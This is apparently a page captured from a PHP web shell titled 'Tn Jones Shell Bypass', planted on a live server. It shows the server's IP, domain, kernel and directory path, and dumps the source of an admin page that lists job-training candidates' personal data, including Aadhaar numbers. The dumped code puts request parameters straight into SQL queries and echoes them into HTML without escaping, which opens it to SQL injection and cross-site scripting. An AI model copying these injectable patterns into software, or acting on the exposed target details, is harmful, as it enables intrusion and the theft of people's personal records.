Tn Jones Shell Bypass
:
3.128.168.219
:
160.187.54.56 / upgov.net
:
Linux 160-187-54-56.cprapid.com 4.18.0-553.22.1.lve.1.el7h.x86_64 #1 SMP Tue Oct 8 14:36:03 UTC 2024 x86_64
:
/
home
/
upgov
/
www
/
rpl
/
report
/
Upload File:
files >> /home/upgov/www/rpl/report/tables1.php
<?php include("connection.php"); session_start(); if (!isset($_SESSION['User']) || ($_SESSION['password'] == '')) { header("location:index.php"); exit(); } if(isset($_SESSION['User'])) { $name=$_SESSION['User']; } $user_query = mysql_query("select * from login where User ='$name'")or die(mysql_error()); $user_row = mysql_fetch_array($user_query); $username = $user_row['User']; ?> <!DOCTYPE HTML> <html> <head> <title>Admin Login : RAMA-DDUGKY</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="keywords" content="Shoppy Responsive web template, Bootstrap Web Templates, Flat Web Templates, Android Compatible web template, Smartphone Compatible web template, free webdesigns for Nokia, Samsung, LG, SonyEricsson, Motorola web design" /> <script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <link href="css/bootstrap.css" rel="stylesheet" type="text/css" media="all"> <!-- Custom Theme files --> <link href="css/style.css" rel="stylesheet" type="text/css" media="all"/> <!--js--> <script src="js/jquery-2.1.1.min.js"></script> <!--icons-css--> <link href="css/font-awesome.css" rel="stylesheet"> <link href="bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet"> <!-- MetisMenu CSS --> <link href="bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet"> <!-- DataTables CSS --> <link href="bower_components/datatables-plugins/integration/bootstrap/3/dataTables.bootstrap.css" rel="stylesheet"> <!-- DataTables Responsive CSS --> <link href="bower_components/datatables-responsive/css/dataTables.responsive.css" rel="stylesheet"> <!-- Custom CSS --> <link href="bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"> <!--Google Fonts--> <link href='//fonts.googleapis.com/css?family=Carrois+Gothic' rel='stylesheet' type='text/css'> <link href='//fonts.googleapis.com/css?family=Work+Sans:400,500,600' rel='stylesheet' type='text/css'> <!--static chart--> <script src="js/Chart.min.js"></script> <!--//charts--> <!-- geo chart --> <script src="//cdn.jsdelivr.net/modernizr/2.8.3/modernizr.min.js" type="text/javascript"></script> <script>window.modernizr || document.write('<script src="lib/modernizr/modernizr-custom.js"><\/script>')</script> <!--<script src="lib/html5shiv/html5shiv.js"></script>--> <!-- Chartinator --> <script src="js/chartinator.js" ></script> <!--geo chart--> <!--skycons-icons--> <script src="js/skycons.js"></script> <!--//skycons-icons--> <script type="text/javascript"> function ExportToExcel(mytblId) { var htmltable = document.getElementById('fixTable'); var html = htmltable.outerHTML; window.open('data:application/vnd.ms-excel,' + encodeURIComponent(html)); } </script> </head> <body> <div class="page-container"> <div class="mother-grid-inner"><br> <form name="frm_image" method="post"> <?php $w=$_REQUEST["t0"]; $w1=$_REQUEST["t1"]; $w2=$_REQUEST["t2"]; $w3=$_REQUEST["t3"]; $w4=$_REQUEST["t4"]; ?> <center> <table> <td><font color="black"><b>Candidate Registration No</b></font><br><input type="text" name="t2" value="<?php echo $w2; ?>" style="font-weight:bold;height:30px;width:180px;" /> </td> <td><font color="black"><b>Name of Candidate</b></font><br><input type="text" name="t3" value="<?php echo $w3; ?>" style="font-weight:bold;height:30px;width:180px;" /> </td> <td><font color="black"><b>Aadhar Card no</b></font><br><input type="text" name="t0" value="<?php echo $w; ?>" style="font-weight:bold;height:30px;width:180px;" /> </td> <td><font color="black"><b>Contact no</b></font><br><input type="text" name="t1" value="<?php echo $w1; ?>" style="font-weight:bold;height:30px;width:180px;" /> </td> <td> <br><input type="submit" value="SEARCH" style='background-color:#002561;width:100px;height:30px;color:white;font-weight:Bold;font-size:16px;' /> </td> <td> <br><a href='dashboard.php'> <input type="Button" name='Back' id='Back' value="BACK" style='background-color:#002561;width:100px;height:30px;color:white;font-weight:Bold;font-size:16px;'></a></td> </table> <div class="blankpage-main"> <!-- /.row --> <?php //include of db config file include ('paginate.php'); //include of paginat page $per_page = 500; // number of results to show per page $result = mysql_query("SELECT * FROM Uppcl_Rpl where Registration_no like '$w2%' and Candidate_Name like '$w3%' and Aadharcard_no like '$w%' and Contact_No like '$w1%' order by Sno DESC"); $total_results = mysql_num_rows($result); $total_pages = ceil($total_results / $per_page);//total pages we going to have //-------------if page is setcheck------------------// if (isset($_GET['page'])) { $show_page = $_GET['page']; //it will telles the current page if ($show_page > 0 && $show_page <= $total_pages) { $start = ($show_page - 1) * $per_page; $end = $start + $per_page; } else { // error - show first set of results $start = 0; $end = $per_page; } } else { // if page isn't set, show first set of results $start = 0; $end = $per_page; } // display pagination $page = intval($_GET['page']); $tpages=$total_pages; if ($page <= 0) $page = 1; ?> <div class="panel panel-default"> <div class="panel-heading"> <b> CANDIDATE REGISTRATION LIST</b> </div> <?php $reload = $_SERVER['PHP_SELF'] . "?tpages=" . $tpages; echo "<div class='panel-body'>"; echo "<div class='table-responsive'> <a href='excel.php'><img src='images/excel.png' title='excel' height='20' align='right' style='margin-right:10px;text-align:right;' ></a> "; // display data in table echo "<table id='fixTable' border='1' class='table table-striped table-bordered table-hover' style='font-size:12px;'>"; echo " <thead> <tr> <th>S.No</th> <th>Date_Of_Registration</th> <th>Registration_no</th> <th>Training_Provider</th> <th>Candidate_Name</th> <th>Father_Name</th> <th>Mother_Name</th> <th>Email_Address</th> <th>Marital_Status</th> <th>Dob</th> <th>Age</th ><th>Gender</th> <th>Caste_Category</th> <th>Contact_No</th> <th>Contact_No2</th> <th>Aadharcard_no</th> <th>Qualification</th> <th>Address</th> <th>DomicileDistrict</th> <th>Sub Station</th> <th>Work_Exp</th> <th>Occupation</th> </tr> </thead>"; // loop through results of database query, displaying them in the table $count1=0; for ($i = $start; $i < $end; $i++) { $count1=$i+1; // make sure that PHP doesn't try to show results that don't exist if ($i == $total_results) { break; } // echo out the contents of each row into a table echo " <tbody>"; echo "<tr " . $cls . " class='odd gradeX'>"; ?> <td style='padding: 10px 0;text-align: center;'><?php echo $count1;?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Created_date');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Registration_no');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Training_Provider');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Candidate_Name');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Father_Name');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Mother_Name');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Email_Address');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Marital_Status');?></td> <td style='padding:10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Dob');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Age');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Gender');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Caste_Category');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Contact_No');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Contact_No2');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Aadharcard_no');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Qualification');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Address');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'DomicileDistrict');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Substation');?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Work_Exp')?></td> <td style='padding: 10px 0;text-align: center;'><?php echo mysql_result($result, $i, 'Occupation');?></td> </tr> <?php echo " </tbody>"; } // close table> echo "</table>"; echo '<div class="pagination"><ul>'; if ($total_pages > 1) { echo paginate($reload, $show_page, $total_pages); } echo "</ul></div>"; // pagination ?> </div> <!-- /.table-responsive --> </div> <!-- /.panel-body --> </div> </div> <!--inner block end here--> <!--copy rights start here--> <div class="copyrights"> <p>© 2016 Shoppy. All Rights Reserved | Design by <a href="http://w3layouts.com/" target="_blank">W3layouts</a> </p> </div> <!--COPY rights end here--> </div> </div> <!--slider menu--> <!--slide bar menu end here--> <script> var toggle = true; $(".sidebar-icon").click(function() { if (toggle) { $(".page-container").addClass("sidebar-collapsed").removeClass("sidebar-collapsed-back"); $("#menu span").css({"position":"absolute"}); } else { $(".page-container").removeClass("sidebar-collapsed").addClass("sidebar-collapsed-back"); setTimeout(function() { $("#menu span").css({"position":"relative"}); }, 400); } toggle = !toggle; }); </script> <!--scrolling js--> <script src="bower_components/jquery/dist/jquery.min.js"></script> <!-- Bootstrap Core JavaScript --> <script src="bower_components/bootstrap/dist/js/bootstrap.min.js"></script> <!-- Metis Menu Plugin JavaScript --> <script src="ower_components/metisMenu/dist/metisMenu.min.js"></script> <!-- DataTables JavaScript --> <script src="bower_components/datatables/media/js/jquery.dataTables.min.js"></script> <script src="bower_components/datatables-plugins/integration/bootstrap/3/dataTables.bootstrap.min.js"></script> <script src="js/scripts.js"></script> <!--//scrolling js--> <script src="js/bootstrap.js"> </script> <!-- mother grid end here--> </body> </html>